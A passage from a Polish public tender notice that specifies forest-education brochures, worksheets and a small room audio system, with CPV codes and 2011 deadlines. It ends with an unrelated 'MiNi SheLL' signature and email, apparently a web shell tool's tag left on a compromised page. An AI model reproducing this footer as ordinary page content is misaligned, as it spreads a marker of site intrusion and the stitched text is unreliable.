2. Wydruk broszur informacyjnych nt. ścieżki dydaktycznej; 5000 szt.; broszura o formacie A4 (rozłożony), złożenie folderu w poziomie - dwa brzegi składane do środka; druk kolorowy, offsetowy; gramatura papieru 170 g/m2, papier błyszczący;  
3. Sporządzenie projektu graficznego kart pracy nt. ścieżki dydaktycznej; szt. 1; trzy kartki w formacie A4 (rozłożony), złożone do formatu A5, zszyte; karty pracy będą zawierać zadania do wykonania i łamigłówki, a także zbiorcze informacje na temat różnych rodzajów drewna i ich zastosowania;
4. Wydruk kart pracy nt ścieżki dydaktycznej; 2000 szt.; trzy kartki w formacie A4 (rozłożony), złożone do formatu A5, zszyte; druk kolorowy, offsetowy; okładka - gramatura papieru 250 g/m2, papier błyszczący; środek - gramatura papieru 170 g/m2, papier matowy;
5. Sporządzenie projektu graficznego broszury informacyjnej nt. Izby Edukacji Leśnej; 1 szt.; broszura o formacie A4 (rozłożony), broszura informacyjna będzie zawierać zaproszenie do Izby Edukacji Leśnej, propozycje tematów zajęć, informacje o dostępnych pomocach dydaktycznych oraz informację o możliwościach dojazdu.
6. Wydruk broszur informacyjnych nt Izby Edukacji Leśnej; 5000 szt.; broszura o formacie A4 (rozłożony), złożenie folderu w poziomie - dwa brzegi składane do środka; druk kolorowy, offsetowy; gramatura papieru 170 g/m2, papier błyszczący;
7. Sporządzenie projektu graficznego kart pracy do Izby Edukacji Leśnej; szt. 1; trzy kartki w formacie A4 (rozłożony), złożone do formatu A5, zszyte; karty pracy będą zawierać zadania do wykonania i łamigłówki związane z sensorycznym poznawaniem lasu.
8. Wydruk kart pracy do Izby Edukacji Leśnej; 2000 szt.; trzy kartki w formacie A4 (rozłożony), złożone do formatu A5, zszyte; druk kolorowy, offsetowy; okładka - gramatura papieru 250 g/m2, papier błyszczący; środek - gramatura papieru 170 g/m2, papier matowy.
Do projektów graficznych Zlecający dostarczy Wykonawcy materiały, w tym teksty i zdjęcia do broszur informacyjnych; Zlecający zaproponuje układ graficzny oraz tematykę grafiki, która zostanie następnie zostanie dostarczona przez Wykonawcę. Projekty zgodne z Księgą Identyfikacji Wizualnej Państwowego Gospodarstwa Leśnego Lasy Państwowe Warszawa 2010 (do pobrania pod adresem: http://bip.lasy.gov.pl/pl/bip/px_~ksiega_identyfikacji03.10.pdf).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa sprzętu audio.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Dostawę i montaż nagłośnienia, 1 szt., nagłośnienie sali o rozmiarach około 10,3x6,8m i wysokości 3,6m; nagłośnienie składa się z:  
1.1. Szafa techniczna do organizacji urządzeń 19 cali 9U GFlex TANGO S BLACK GFWS6409.901, 1 szt. lub równoważne: szafka wisząca jednoczęściowa wykonana ze stali; wymiary min. 600/450/501 mm (szerokość/głębokość/wysokość), zdejmowane panele boczne, wpusty kablowe na dole i górze szafki, 
1.2. Listwa zasilająca 230V do urządzeń MXL018B083-A, 1 szt. lub równoważne: listwa zasilająca 230V, 8 gniazdowa, długość kabla 3m, obciążenie max 16A, dostosowana do montażu w szafie technicznej 19 cali, z wyłącznikiem,
1.3. Półka organizacyjna 19 cali GFS-2114A, 1 szt. lub równoważne: półka organizacyjna dostosowana do montażu w szafie technicznej 19 cali,
1.4. Wzmacniacz miksujący BOSH PLE-1MA120-EU, 1 szt. lub równoważne: wzmacniacz miksujący, zakres mocy: 30, 60 i 120 W, min. 4 wejścia mikrofonowe/liniowych i min. 3 wejścia źródła sygnału muzycznego, wejście 100 V i telefoniczne z priorytetem i funkcją VOX, Wyjście tylko dla wywołania, 3-żyłowe obejście regulacji głośności, wyjście liniowe i wyjście wyłącznie do odtwarzania,
1.5. Głośnik muzyczny BOSH LB2-UC30-D, 4 szt. lub równoważne: głośnik o mocy min. 30W, możliwość wyboru wejść 8 amperów, 70 V lub 100 V,
1.6. Mikrofon bezprzewodowy BOSH MW1-HTX-F1, 1 szt. lub równoważne: mikrofon bezprzewodowy 790-814MHZ, 193 kanały UHF, technologia syntezy PLL, min. 15 godzin pracy przy użyciu baterii alkalicznych, funkcja blokady, wyświetlacz LCD z sygnalizacją stanu baterii i częstotliwości pracy
1.7. Odbiornik mikrofonów bezprzewodowych BOSH MW1-RX-F1, 1 szt. lub równoważne: odbiornik mikrofonów bezprzewodowych, 790- 814MHZ, 193 automatycznie wybierane kanały UHF, technologia syntezy PLL, Ton pilota i blokada szumów, montaż stołowy lub w szafie technicznej 19 cali,
1.8. Statyw stołowy mikrofonu BOSH LBC1227/01, 1 szt. lub równoważne: statyw stołowy mikrofonu;
2. Przewody połączeniowe, audio i głośnikowe (min. 50 m) niezbędne do montażu nagłośnienia oraz listwa montażowa, Dostawę miniwieży; 1 szt.; miniwieża Pioneer X-HM50-K lub równoważna: moc znamionowa RMS  2 x 50 W; zestaw głośnikowy min. 2  szt.;  odtwarzacz płyt CD 1-płytowy; standardy odtwarzania dźwięku: CD Audio, CD-R, CD-RW, MP3, WMA;  radio cyfrowe zakres AM, FM (UKF); wbudowany odtwarzacz CD; port USB; wyjście słuchawkowe; pilot na wyposażeniu; 
Na wszystkie elementy zadania wymagana jest gwarancja producencka 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.30.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com